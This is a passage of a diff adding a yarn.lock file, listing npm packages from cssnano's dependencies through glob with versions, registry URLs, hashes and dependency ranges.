+  dependencies:
+    autoprefixer "^6.3.1"
+    decamelize "^1.1.2"
+    defined "^1.0.0"
+    has "^1.0.1"
+    object-assign "^4.0.1"
+    postcss "^5.0.14"
+    postcss-calc "^5.2.0"
+    postcss-colormin "^2.1.8"
+    postcss-convert-values "^2.3.4"
+    postcss-discard-comments "^2.0.4"
+    postcss-discard-duplicates "^2.0.1"
+    postcss-discard-empty "^2.0.1"
+    postcss-discard-overridden "^0.1.1"
+    postcss-discard-unused "^2.2.1"
+    postcss-filter-plugins "^2.0.0"
+    postcss-merge-idents "^2.1.5"
+    postcss-merge-longhand "^2.0.1"
+    postcss-merge-rules "^2.0.3"
+    postcss-minify-font-values "^1.0.2"
+    postcss-minify-gradients "^1.0.1"
+    postcss-minify-params "^1.0.4"
+    postcss-minify-selectors "^2.0.4"
+    postcss-normalize-charset "^1.1.0"
+    postcss-normalize-url "^3.0.7"
+    postcss-ordered-values "^2.1.0"
+    postcss-reduce-idents "^2.2.2"
+    postcss-reduce-initial "^1.0.0"
+    postcss-reduce-transforms "^1.0.3"
+    postcss-svgo "^2.1.1"
+    postcss-unique-selectors "^2.0.2"
+    postcss-value-parser "^3.2.3"
+    postcss-zindex "^2.0.1"
+
+csso@~2.3.1:
+  version "2.3.2"
+  resolved "https://registry.yarnpkg.com/csso/-/csso-2.3.2.tgz#ddd52c587033f49e94b71fc55569f252e8ff5f85"
+  dependencies:
+    clap "^1.0.9"
+    source-map "^0.5.3"
+
+currently-unhandled@^0.4.1:
+  version "0.4.1"
+  resolved "https://registry.yarnpkg.com/currently-unhandled/-/currently-unhandled-0.4.1.tgz#988df33feab191ef799a61369dd76c17adf957ea"
+  dependencies:
+    array-find-index "^1.0.1"
+
+cyclist@~0.2.2:
+  version "0.2.2"
+  resolved "https://registry.yarnpkg.com/cyclist/-/cyclist-0.2.2.tgz#1b33792e11e914a2fd6d6ed6447464444e5fa640"
+
+d@1:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/d/-/d-1.0.0.tgz#754bb5bfe55451da69a58b94d45f4c5b0462d58f"
+  dependencies:
+    es5-ext "^0.10.9"
+
+date-now@^0.1.4:
+  version "0.1.4"
+  resolved "https://registry.yarnpkg.com/date-now/-/date-now-0.1.4.tgz#eaf439fd4d4848ad74e5cc7dbef200672b9e345b"
+
+de-indent@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/de-indent/-/de-indent-1.0.2.tgz#b2038e846dc33baa5796128d0804b455b8c1e21d"
+
+debug@*, debug@^3.1.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/debug/-/debug-3.1.0.tgz#5bb5a0672628b64149566ba16819e61518c67261"
+  dependencies:
+    ms "2.0.0"
+
+debug@^2.1.2, debug@^2.2.0, debug@^2.3.3, debug@^2.6.1, debug@^2.6.3, debug@^2.6.8:
+  version "2.6.9"
+  resolved "https://registry.yarnpkg.com/debug/-/debug-2.6.9.tgz#5d128515df134ff327e90a4c93f4e077a536341f"
+  dependencies:
+    ms "2.0.0"
+
+decamelize-keys@^1.0.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/decamelize-keys/-/decamelize-keys-1.1.0.tgz#d171a87933252807eb3cb61dc1c1445d078df2d9"
+  dependencies:
+    decamelize "^1.1.0"
+    map-obj "^1.0.0"
+
+decamelize@^1.1.0, decamelize@^1.1.2:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/decamelize/-/decamelize-1.2.0.tgz#f6534d15148269b20352e7bee26f501f9a191290"
+
+decode-uri-component@^0.2.0:
+  version "0.2.0"
+  resolved "https://registry.yarnpkg.com/decode-uri-component/-/decode-uri-component-0.2.0.tgz#eb3913333458775cb84cd1a1fae062106bb87545"
+
+deep-equal@~1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/deep-equal/-/deep-equal-1.0.1.tgz#f5d260292b660e084eff4cdbc9f08ad3247448b5"
+
+deep-extend@^0.6.0:
+  version "0.6.0"
+  resolved "https://registry.yarnpkg.com/deep-extend/-/deep-extend-0.6.0.tgz#c4fa7c95404a17a9c3e8ca7e1537312b736330ac"
+
+deepmerge@^1.5.2:
+  version "1.5.2"
+  resolved "https://registry.yarnpkg.com/deepmerge/-/deepmerge-1.5.2.tgz#10499d868844cdad4fee0842df8c7f6f0c95a753"
+
+define-properties@^1.1.2:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/define-properties/-/define-properties-1.1.2.tgz#83a73f2fea569898fb737193c8f873caf6d45c94"
+  dependencies:
+    foreach "^2.0.5"
+    object-keys "^1.0.8"
+
+define-property@^0.2.5:
+  version "0.2.5"
+  resolved "https://registry.yarnpkg.com/define-property/-/define-property-0.2.5.tgz#c35b1ef918ec3c990f9a5bc57be04aacec5c8116"
+  dependencies:
+    is-descriptor "^0.1.0"
+
+define-property@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/define-property/-/define-property-1.0.0.tgz#769ebaaf3f4a63aad3af9e8d304c9bbe79bfb0e6"
+  dependencies:
+    is-descriptor "^1.0.0"
+
+define-property@^2.0.2:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/define-property/-/define-property-2.0.2.tgz#d459689e8d654ba77e02a817f8710d702cb16e9d"
+  dependencies:
+    is-descriptor "^1.0.2"
+    isobject "^3.0.1"
+
+defined@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/defined/-/defined-1.0.0.tgz#c98d9bcef75674188e110969151199e39b1fa693"
+
+delegate@^3.1.2:
+  version "3.2.0"
+  resolved "https://registry.yarnpkg.com/delegate/-/delegate-3.2.0.tgz#b66b71c3158522e8ab5744f720d8ca0c2af59166"
+
+delegates@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/delegates/-/delegates-1.0.0.tgz#84c6e159b81904fdca59a0ef44cd870d31250f9a"
+
+depd@^1.1.0, depd@~1.1.1, depd@~1.1.2:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/depd/-/depd-1.1.2.tgz#9bcd52e14c097763e749b274c4346ed2e560b5a9"
+
+des.js@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/des.js/-/des.js-1.0.0.tgz#c074d2e2aa6a8a9a07dbd61f9a15c2cd83ec8ecc"
+  dependencies:
+    inherits "^2.0.1"
+    minimalistic-assert "^1.0.0"
+
+destroy@^1.0.3:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/destroy/-/destroy-1.0.4.tgz#978857442c44749e4206613e37946205826abd80"
+
+detect-libc@^1.0.2:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/detect-libc/-/detect-libc-1.0.3.tgz#fa137c4bd698edf55cd5cd02ac559f91a4c4ba9b"
+
+diacritics@^1.3.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/diacritics/-/diacritics-1.3.0.tgz#3efa87323ebb863e6696cebb0082d48ff3d6f7a1"
+
+diffie-hellman@^5.0.0:
+  version "5.0.3"
+  resolved "https://registry.yarnpkg.com/diffie-hellman/-/diffie-hellman-5.0.3.tgz#40e8ee98f55a2149607146921c63e1ae5f3d2875"
+  dependencies:
+    bn.js "^4.1.0"
+    miller-rabin "^4.0.0"
+    randombytes "^2.0.0"
+
+dir-glob@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/dir-glob/-/dir-glob-2.0.0.tgz#0b205d2b6aef98238ca286598a8204d29d0a0034"
+  dependencies:
+    arrify "^1.0.1"
+    path-type "^3.0.0"
+
+docsearch.js@^2.5.2:
+  version "2.5.2"
+  resolved "https://registry.yarnpkg.com/docsearch.js/-/docsearch.js-2.5.2.tgz#1a3521c92e5f252cc522c57357ef1c47b945b381"
+  dependencies:
+    algoliasearch "^3.24.5"
+    autocomplete.js "^0.29.0"
+    hogan.js "^3.0.2"
+    to-factory "^1.0.0"
+
+dom-converter@~0.1:
+  version "0.1.4"
+  resolved "https://registry.yarnpkg.com/dom-converter/-/dom-converter-0.1.4.tgz#a45ef5727b890c9bffe6d7c876e7b19cb0e17f3b"
+  dependencies:
+    utila "~0.3"
+
+dom-serializer@0:
+  version "0.1.0"
+  resolved "https://registry.yarnpkg.com/dom-serializer/-/dom-serializer-0.1.0.tgz#073c697546ce0780ce23be4a28e293e40bc30c82"
+  dependencies:
+    domelementtype "~1.1.1"
+    entities "~1.1.1"
+
+dom-walk@^0.1.0:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/dom-walk/-/dom-walk-0.1.1.tgz#672226dc74c8f799ad35307df936aba11acd6018"
+
+domain-browser@^1.1.1:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/domain-browser/-/domain-browser-1.2.0.tgz#3d31f50191a6749dd1375a7f522e823d42e54eda"
+
+domelementtype@1:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/domelementtype/-/domelementtype-1.3.0.tgz#b17aed82e8ab59e52dd9c19b1756e0fc187204c2"
+
+domelementtype@~1.1.1:
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/domelementtype/-/domelementtype-1.1.3.tgz#bd28773e2642881aec51544924299c5cd822185b"
+
+domhandler@2.1:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/domhandler/-/domhandler-2.1.0.tgz#d2646f5e57f6c3bab11cf6cb05d3c0acf7412594"
+  dependencies:
+    domelementtype "1"
+
+domutils@1.1:
+  version "1.1.6"
+  resolved "https://registry.yarnpkg.com/domutils/-/domutils-1.1.6.tgz#bddc3de099b9a2efacc51c623f28f416ecc57485"
+  dependencies:
+    domelementtype "1"
+
+domutils@1.5.1:
+  version "1.5.1"
+  resolved "https://registry.yarnpkg.com/domutils/-/domutils-1.5.1.tgz#dcd8488a26f563d61079e48c9f7b7e32373682cf"
+  dependencies:
+    dom-serializer "0"
+    domelementtype "1"
+
+dot-prop@^4.1.0, dot-prop@^4.1.1:
+  version "4.2.0"
+  resolved "https://registry.yarnpkg.com/dot-prop/-/dot-prop-4.2.0.tgz#1f19e0c2e1aa0e32797c49799f2837ac6af69c57"
+  dependencies:
+    is-obj "^1.0.0"
+
+duplexer3@^0.1.4:
+  version "0.1.4"
+  resolved "https://registry.yarnpkg.com/duplexer3/-/duplexer3-0.1.4.tgz#ee01dd1cac0ed3cbc7fdbea37dc0a8f1ce002ce2"
+
+duplexify@^3.4.2, duplexify@^3.6.0:
+  version "3.6.0"
+  resolved "https://registry.yarnpkg.com/duplexify/-/duplexify-3.6.0.tgz#592903f5d80b38d037220541264d69a198fb3410"
+  dependencies:
+    end-of-stream "^1.0.0"
+    inherits "^2.0.1"
+    readable-stream "^2.0.0"
+    stream-shift "^1.0.0"
+
+ee-first@1.1.1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/ee-first/-/ee-first-1.1.1.tgz#590c61156b0ae2f4f0255732a158b266bc56b21d"
+
+electron-to-chromium@^1.2.7, electron-to-chromium@^1.3.47:
+  version "1.3.50"
+  resolved "https://registry.yarnpkg.com/electron-to-chromium/-/electron-to-chromium-1.3.50.tgz#7438b76f92b41b919f3fbdd350fbd0757dacddf7"
+
+elliptic@^6.0.0:
+  version "6.4.0"
+  resolved "https://registry.yarnpkg.com/elliptic/-/elliptic-6.4.0.tgz#cac9af8762c85836187003c8dfe193e5e2eae5df"
+  dependencies:
+    bn.js "^4.4.0"
+    brorand "^1.0.1"
+    hash.js "^1.0.0"
+    hmac-drbg "^1.0.0"
+    inherits "^2.0.1"
+    minimalistic-assert "^1.0.0"
+    minimalistic-crypto-utils "^1.0.0"
+
+emojis-list@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/emojis-list/-/emojis-list-2.1.0.tgz#4daa4d9db00f9819880c79fa457ae5b09a1fd389"
+
+end-of-stream@^1.0.0, end-of-stream@^1.1.0:
+  version "1.4.1"
+  resolved "https://registry.yarnpkg.com/end-of-stream/-/end-of-stream-1.4.1.tgz#ed29634d19baba463b6ce6b80a37213eab71ec43"
+  dependencies:
+    once "^1.4.0"
+
+enhanced-resolve@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/enhanced-resolve/-/enhanced-resolve-4.0.0.tgz#e34a6eaa790f62fccd71d93959f56b2b432db10a"
+  dependencies:
+    graceful-fs "^4.1.2"
+    memory-fs "^0.4.0"
+    tapable "^1.0.0"
+
+entities@~1.1.1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/entities/-/entities-1.1.1.tgz#6e5c2d0a5621b5dadaecef80b90edfb5cd7772f0"
+
+envify@^4.0.0:
+  version "4.1.0"
+  resolved "https://registry.yarnpkg.com/envify/-/envify-4.1.0.tgz#f39ad3db9d6801b4e6b478b61028d3f0b6819f7e"
+  dependencies:
+    esprima "^4.0.0"
+    through "~2.3.4"
+
+errno@^0.1.3, errno@~0.1.7:
+  version "0.1.7"
+  resolved "https://registry.yarnpkg.com/errno/-/errno-0.1.7.tgz#4684d71779ad39af177e3f007996f7c67c852618"
+  dependencies:
+    prr "~1.0.1"
+
+error-ex@^1.2.0, error-ex@^1.3.1:
+  version "1.3.2"
+  resolved "https://registry.yarnpkg.com/error-ex/-/error-ex-1.3.2.tgz#b4ac40648107fdcdcfae242f428bea8a14d4f1bf"
+  dependencies:
+    is-arrayish "^0.2.1"
+
+error-inject@~1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/error-inject/-/error-inject-1.0.0.tgz#e2b3d91b54aed672f309d950d154850fa11d4f37"
+
+es-abstract@^1.5.1:
+  version "1.12.0"
+  resolved "https://registry.yarnpkg.com/es-abstract/-/es-abstract-1.12.0.tgz#9dbbdd27c6856f0001421ca18782d786bf8a6165"
+  dependencies:
+    es-to-primitive "^1.1.1"
+    function-bind "^1.1.1"
+    has "^1.0.1"
+    is-callable "^1.1.3"
+    is-regex "^1.0.4"
+
+es-to-primitive@^1.1.1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/es-to-primitive/-/es-to-primitive-1.1.1.tgz#45355248a88979034b6792e19bb81f2b7975dd0d"
+  dependencies:
+    is-callable "^1.1.1"
+    is-date-object "^1.0.1"
+    is-symbol "^1.0.1"
+
+es5-ext@^0.10.35, es5-ext@^0.10.9, es5-ext@~0.10.14:
+  version "0.10.45"
+  resolved "https://registry.yarnpkg.com/es5-ext/-/es5-ext-0.10.45.tgz#0bfdf7b473da5919d5adf3bd25ceb754fccc3653"
+  dependencies:
+    es6-iterator "~2.0.3"
+    es6-symbol "~3.1.1"
+    next-tick "1"
+
+es6-iterator@~2.0.3:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/es6-iterator/-/es6-iterator-2.0.3.tgz#a7de889141a05a94b0854403b2d0a0fbfa98f3b7"
+  dependencies:
+    d "1"
+    es5-ext "^0.10.35"
+    es6-symbol "^3.1.1"
+
+es6-promise@^4.1.0:
+  version "4.2.4"
+  resolved "https://registry.yarnpkg.com/es6-promise/-/es6-promise-4.2.4.tgz#dc4221c2b16518760bd8c39a52d8f356fc00ed29"
+
+es6-symbol@^3.1.1, es6-symbol@~3.1.1:
+  version "3.1.1"
+  resolved "https://registry.yarnpkg.com/es6-symbol/-/es6-symbol-3.1.1.tgz#bf00ef4fdab6ba1b46ecb7b629b4c7ed5715cc77"
+  dependencies:
+    d "1"
+    es5-ext "~0.10.14"
+
+escape-html@^1.0.3, escape-html@~1.0.1:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/escape-html/-/escape-html-1.0.3.tgz#0258eae4d3d0c0974de1c169188ef0051d1d1988"
+
+escape-string-regexp@^1.0.2, escape-string-regexp@^1.0.5:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz#1b61c0562190a8dff6ae3bb2cf0200ca130b86d4"
+
+eslint-scope@^3.7.1:
+  version "3.7.1"
+  resolved "https://registry.yarnpkg.com/eslint-scope/-/eslint-scope-3.7.1.tgz#3d63c3edfda02e06e01a452ad88caacc7cdcb6e8"
+  dependencies:
+    esrecurse "^4.1.0"
+    estraverse "^4.1.1"
+
+esprima@^2.6.0:
+  version "2.7.3"
+  resolved "https://registry.yarnpkg.com/esprima/-/esprima-2.7.3.tgz#96e3b70d5779f6ad49cd032673d1c312767ba581"
+
+esprima@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/esprima/-/esprima-4.0.0.tgz#4499eddcd1110e0b218bacf2fa7f7f59f55ca804"
+
+esrecurse@^4.1.0:
+  version "4.2.1"
+  resolved "https://registry.yarnpkg.com/esrecurse/-/esrecurse-4.2.1.tgz#007a3b9fdbc2b3bb87e4879ea19c92fdbd3942cf"
+  dependencies:
+    estraverse "^4.1.0"
+
+estraverse@^4.1.0, estraverse@^4.1.1:
+  version "4.2.0"
+  resolved "https://registry.yarnpkg.com/estraverse/-/estraverse-4.2.0.tgz#0dee3fed31fcd469618ce7342099fc1afa0bdb13"
+
+esutils@^2.0.2:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/esutils/-/esutils-2.0.2.tgz#0abf4f1caa5bcb1f7a9d8acc6dea4faaa04bac9b"
+
+events@^1.0.0, events@^1.1.0:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/events/-/events-1.1.1.tgz#9ebdb7635ad099c70dcc4c2a1f5004288e8bd924"
+
+evp_bytestokey@^1.0.0, evp_bytestokey@^1.0.3:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/evp_bytestokey/-/evp_bytestokey-1.0.3.tgz#7fcbdb198dc71959432efe13842684e0525acb02"
+  dependencies:
+    md5.js "^1.3.4"
+    safe-buffer "^5.1.1"
+
+execa@^0.7.0:
+  version "0.7.0"
+  resolved "https://registry.yarnpkg.com/execa/-/execa-0.7.0.tgz#944becd34cc41ee32a63a9faf27ad5a65fc59777"
+  dependencies:
+    cross-spawn "^5.0.1"
+    get-stream "^3.0.0"
+    is-stream "^1.1.0"
+    npm-run-path "^2.0.0"
+    p-finally "^1.0.0"
+    signal-exit "^3.0.0"
+    strip-eof "^1.0.0"
+
+execa@^0.8.0:
+  version "0.8.0"
+  resolved "https://registry.yarnpkg.com/execa/-/execa-0.8.0.tgz#d8d76bbc1b55217ed190fd6dd49d3c774ecfc8da"
+  dependencies:
+    cross-spawn "^5.0.1"
+    get-stream "^3.0.0"
+    is-stream "^1.1.0"
+    npm-run-path "^2.0.0"
+    p-finally "^1.0.0"
+    signal-exit "^3.0.0"
+    strip-eof "^1.0.0"
+
+expand-brackets@^0.1.4:
+  version "0.1.5"
+  resolved "https://registry.yarnpkg.com/expand-brackets/-/expand-brackets-0.1.5.tgz#df07284e342a807cd733ac5af72411e581d1177b"
+  dependencies:
+    is-posix-bracket "^0.1.0"
+
+expand-brackets@^2.1.4:
+  version "2.1.4"
+  resolved "https://registry.yarnpkg.com/expand-brackets/-/expand-brackets-2.1.4.tgz#b77735e315ce30f6b6eff0f83b04151a22449622"
+  dependencies:
+    debug "^2.3.3"
+    define-property "^0.2.5"
+    extend-shallow "^2.0.1"
+    posix-character-classes "^0.1.0"
+    regex-not "^1.0.0"
+    snapdragon "^0.8.1"
+    to-regex "^3.0.1"
+
+expand-range@^1.8.1:
+  version "1.8.2"
+  resolved "https://registry.yarnpkg.com/expand-range/-/expand-range-1.8.2.tgz#a299effd335fe2721ebae8e257ec79644fc85337"
+  dependencies:
+    fill-range "^2.1.0"
+
+extend-shallow@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/extend-shallow/-/extend-shallow-2.0.1.tgz#51af7d614ad9a9f610ea1bafbb989d6b1c56890f"
+  dependencies:
+    is-extendable "^0.1.0"
+
+extend-shallow@^3.0.0, extend-shallow@^3.0.2:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/extend-shallow/-/extend-shallow-3.0.2.tgz#26a71aaf073b39fb2127172746131c2704028db8"
+  dependencies:
+    assign-symbols "^1.0.0"
+    is-extendable "^1.0.1"
+
+extglob@^0.3.1:
+  version "0.3.2"
+  resolved "https://registry.yarnpkg.com/extglob/-/extglob-0.3.2.tgz#2e18ff3d2f49ab2765cec9023f011daa8d8349a1"
+  dependencies:
+    is-extglob "^1.0.0"
+
+extglob@^2.0.4:
+  version "2.0.4"
+  resolved "https://registry.yarnpkg.com/extglob/-/extglob-2.0.4.tgz#ad00fe4dc612a9232e8718711dc5cb5ab0285543"
+  dependencies:
+    array-unique "^0.3.2"
+    define-property "^1.0.0"
+    expand-brackets "^2.1.4"
+    extend-shallow "^2.0.1"
+    fragment-cache "^0.2.1"
+    regex-not "^1.0.0"
+    snapdragon "^0.8.1"
+    to-regex "^3.0.1"
+
+fast-deep-equal@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz#7b05218ddf9667bf7f370bf7fdb2cb15fdd0aa49"
+
+fast-glob@^2.0.2:
+  version "2.2.2"
+  resolved "https://registry.yarnpkg.com/fast-glob/-/fast-glob-2.2.2.tgz#71723338ac9b4e0e2fff1d6748a2a13d5ed352bf"
+  dependencies:
+    "@mrmlnc/readdir-enhanced" "^2.2.1"
+    "@nodelib/fs.stat" "^1.0.1"
+    glob-parent "^3.1.0"
+    is-glob "^4.0.0"
+    merge2 "^1.2.1"
+    micromatch "^3.1.10"
+
+fast-json-stable-stringify@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/fast-json-stable-stringify/-/fast-json-stable-stringify-2.0.0.tgz#d5142c0caee6b1189f87d3a76111064f86c8bbf2"
+
+fastparse@^1.1.1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/fastparse/-/fastparse-1.1.1.tgz#d1e2643b38a94d7583b479060e6c4affc94071f8"
+
+figures@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/figures/-/figures-2.0.0.tgz#3ab1a2d2a62c8bfb431a0c94cb797a2fce27c962"
+  dependencies:
+    escape-string-regexp "^1.0.5"
+
+file-loader@^1.1.11:
+  version "1.1.11"
+  resolved "https://registry.yarnpkg.com/file-loader/-/file-loader-1.1.11.tgz#6fe886449b0f2a936e43cabaac0cdbfb369506f8"
+  dependencies:
+    loader-utils "^1.0.2"
+    schema-utils "^0.4.5"
+
+filename-regex@^2.0.0:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/filename-regex/-/filename-regex-2.0.1.tgz#c1c4b9bee3e09725ddb106b75c1e301fe2f18b26"
+
+fill-range@^2.1.0:
+  version "2.2.4"
+  resolved "https://registry.yarnpkg.com/fill-range/-/fill-range-2.2.4.tgz#eb1e773abb056dcd8df2bfdf6af59b8b3a936565"
+  dependencies:
+    is-number "^2.1.0"
+    isobject "^2.0.0"
+    randomatic "^3.0.0"
+    repeat-element "^1.1.2"
+    repeat-string "^1.5.2"
+
+fill-range@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/fill-range/-/fill-range-4.0.0.tgz#d544811d428f98eb06a63dc402d2403c328c38f7"
+  dependencies:
+    extend-shallow "^2.0.1"
+    is-number "^3.0.0"
+    repeat-string "^1.6.1"
+    to-regex-range "^2.1.0"
+
+find-cache-dir@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/find-cache-dir/-/find-cache-dir-1.0.0.tgz#9288e3e9e3cc3748717d39eade17cf71fc30ee6f"
+  dependencies:
+    commondir "^1.0.1"
+    make-dir "^1.0.0"
+    pkg-dir "^2.0.0"
+
+find-up@^2.0.0, find-up@^2.1.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/find-up/-/find-up-2.1.0.tgz#45d1b7e506c717ddd482775a2b77920a3c0c57a7"
+  dependencies:
+    locate-path "^2.0.0"
+
+flatten@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/flatten/-/flatten-1.0.2.tgz#dae46a9d78fbe25292258cc1e780a41d95c03782"
+
+flush-write-stream@^1.0.0:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/flush-write-stream/-/flush-write-stream-1.0.3.tgz#c5d586ef38af6097650b49bc41b55fabb19f35bd"
+  dependencies:
+    inherits "^2.0.1"
+    readable-stream "^2.0.4"
+
+for-in@^1.0.1, for-in@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/for-in/-/for-in-1.0.2.tgz#81068d295a8142ec0ac726c6e2200c30fb6d5e80"
+
+for-own@^0.1.4:
+  version "0.1.5"
+  resolved "https://registry.yarnpkg.com/for-own/-/for-own-0.1.5.tgz#5265c681a4f294dabbf17c9509b6763aa84510ce"
+  dependencies:
+    for-in "^1.0.1"
+
+foreach@^2.0.5:
+  version "2.0.5"
+  resolved "https://registry.yarnpkg.com/foreach/-/foreach-2.0.5.tgz#0bee005018aeb260d0a3af3ae658dd0136ec1b99"
+
+fragment-cache@^0.2.1:
+  version "0.2.1"
+  resolved "https://registry.yarnpkg.com/fragment-cache/-/fragment-cache-0.2.1.tgz#4290fad27f13e89be7f33799c6bc5a0abfff0d19"
+  dependencies:
+    map-cache "^0.2.2"
+
+fresh@^0.5.2:
+  version "0.5.2"
+  resolved "https://registry.yarnpkg.com/fresh/-/fresh-0.5.2.tgz#3d8cadd90d976569fa835ab1f8e4b23a105605a7"
+
+from2@^2.1.0:
+  version "2.3.0"
+  resolved "https://registry.yarnpkg.com/from2/-/from2-2.3.0.tgz#8bfb5502bde4a4d36cfdeea007fcca21d7e382af"
+  dependencies:
+    inherits "^2.0.1"
+    readable-stream "^2.0.0"
+
+fs-extra@^4.0.2:
+  version "4.0.3"
+  resolved "https://registry.yarnpkg.com/fs-extra/-/fs-extra-4.0.3.tgz#0d852122e5bc5beb453fb028e9c0c9bf36340c94"
+  dependencies:
+    graceful-fs "^4.1.2"
+    jsonfile "^4.0.0"
+    universalify "^0.1.0"
+
+fs-extra@^5.0.0:
+  version "5.0.0"
+  resolved "https://registry.yarnpkg.com/fs-extra/-/fs-extra-5.0.0.tgz#414d0110cdd06705734d055652c5411260c31abd"
+  dependencies:
+    graceful-fs "^4.1.2"
+    jsonfile "^4.0.0"
+    universalify "^0.1.0"
+
+fs-minipass@^1.2.5:
+  version "1.2.5"
+  resolved "https://registry.yarnpkg.com/fs-minipass/-/fs-minipass-1.2.5.tgz#06c277218454ec288df77ada54a03b8702aacb9d"
+  dependencies:
+    minipass "^2.2.1"
+
+fs-write-stream-atomic@^1.0.8:
+  version "1.0.10"
+  resolved "https://registry.yarnpkg.com/fs-write-stream-atomic/-/fs-write-stream-atomic-1.0.10.tgz#b47df53493ef911df75731e70a9ded0189db40c9"
+  dependencies:
+    graceful-fs "^4.1.2"
+    iferr "^0.1.5"
+    imurmurhash "^0.1.4"
+    readable-stream "1 || 2"
+
+fs.realpath@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/fs.realpath/-/fs.realpath-1.0.0.tgz#1504ad2523158caa40db4a2787cb01411994ea4f"
+
+fsevents@^1.2.2:
+  version "1.2.4"
+  resolved "https://registry.yarnpkg.com/fsevents/-/fsevents-1.2.4.tgz#f41dcb1af2582af3692da36fc55cbd8e1041c426"
+  dependencies:
+    nan "^2.9.2"
+    node-pre-gyp "^0.10.0"
+
+function-bind@^1.1.1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/function-bind/-/function-bind-1.1.1.tgz#a56899d3ea3c9bab874bb9773b7c5ede92f4895d"
+
+gauge@~2.7.3:
+  version "2.7.4"
+  resolved "https://registry.yarnpkg.com/gauge/-/gauge-2.7.4.tgz#2c03405c7538c39d7eb37b317022e325fb018bf7"
+  dependencies:
+    aproba "^1.0.3"
+    console-control-strings "^1.0.0"
+    has-unicode "^2.0.0"
+    object-assign "^4.1.0"
+    signal-exit "^3.0.0"
+    string-width "^1.0.1"
+    strip-ansi "^3.0.1"
+    wide-align "^1.1.0"
+
+get-port@^3.2.0:
+  version "3.2.0"
+  resolved "https://registry.yarnpkg.com/get-port/-/get-port-3.2.0.tgz#dd7ce7de187c06c8bf353796ac71e099f0980ebc"
+
+get-stream@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/get-stream/-/get-stream-3.0.0.tgz#8e943d1358dc37555054ecbe2edb05aa174ede14"
+
+get-value@^2.0.3, get-value@^2.0.6:
+  version "2.0.6"
+  resolved "https://registry.yarnpkg.com/get-value/-/get-value-2.0.6.tgz#dc15ca1c672387ca76bd37ac0a395ba2042a2c28"
+
+glob-base@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/glob-base/-/glob-base-0.3.0.tgz#dbb164f6221b1c0b1ccf82aea328b497df0ea3c4"
+  dependencies:
+    glob-parent "^2.0.0"
+    is-glob "^2.0.0"
+
+glob-parent@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/glob-parent/-/glob-parent-2.0.0.tgz#81383d72db054fcccf5336daa902f182f6edbb28"
+  dependencies:
+    is-glob "^2.0.0"
+
+glob-parent@^3.1.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/glob-parent/-/glob-parent-3.1.0.tgz#9e6af6299d8d3bd2bd40430832bd113df906c5ae"
+  dependencies:
+    is-glob "^3.1.0"
+    path-dirname "^1.0.0"
+
+glob-to-regexp@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/glob-to-regexp/-/glob-to-regexp-0.3.0.tgz#8c5a1494d2066c570cc3bfe4496175acc4d502ab"
+
+glob@7.0.x:
+  version "7.0.6"
+  resolved "https://registry.yarnpkg.com/glob/-/glob-7.0.6.tgz#211bafaf49e525b8cd93260d14ab136152b3f57a"
+  dependencies:
+    fs.realpath "^1.0.0"
